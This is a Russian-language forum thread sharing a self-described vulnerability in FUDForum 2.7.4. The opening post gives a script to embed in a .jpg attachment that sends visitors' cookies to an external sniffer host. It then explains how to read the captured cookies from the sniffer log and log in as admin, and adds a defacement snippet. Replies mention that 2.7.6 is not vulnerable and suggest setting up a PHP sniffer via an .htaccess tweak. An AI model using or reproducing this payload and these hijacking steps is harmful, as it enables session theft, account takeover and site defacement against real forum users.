Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: 1
RSS
Уязвимость в FUDForum, Уязвимость в FUDForum
 
Моя уязвимость, я её нашёл.
Вобщем делается так:
Берём картинку, с названием 1.jpg
Открываем блокнотом. И вставляем в картинку допустим
Код
<html>
<head>
<script>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
</head>
</html>


После вставки в сообщение будет ссылка наподобии этой:
Код
http://forum.site.ru/index.php?t=getfile&id=2723&private=0

или так нагляднее:
Код
http://forum.site.ru/index.php?t=getfile&id=2723

После открытия этой ссылки произойдёт кража куков пользователей
На проверку кода PHP ещё не проверял, но возможно.
******
Далее идем сюда:
http://old.antichat.ru/sniff/log.php
И вставляем куки себе. И ты админ.

Можно поприкалываться и так:
Код
<html>
<head>
<h1>Defaced by HiMiC</h1>
</head>
</html>
[CODE]
 
Цитата
Игорь Бабичев aka HiMiC пишет:
Моя уязвимость, я её нашёл.


))))))))) не слишком громко сказано?

Цитата
Игорь Бабичев aka HiMiC пишет:
Defaced by HiMiC

глупо
 
Powered by: FUDforum 2.7.4

Уязвима эта версия, новее нету. Потому и не проверял.


Powered by: FUDforum 2.7.6. - эта неуязвима.
 
Как кук слить то со снифера?
 
Цитата
S S пишет:
Как кук слить то со снифера?
если вы про сниффер античата то возможно вам стоит зарегистрироваться  =/
 
Цитата
если вы про сниффер античата то возможно вам стоит зарегистрироваться =/

Конечно, кроме того ради интереса можно и свой намутить. Это не так сложно. Главное не забыть, сделать правку в .htaccess",  добавив AddType application/x-httpd-php .jpg. Примеров снифферов в сети на PHP огромное кол-во.
Страницы: 1
Читают тему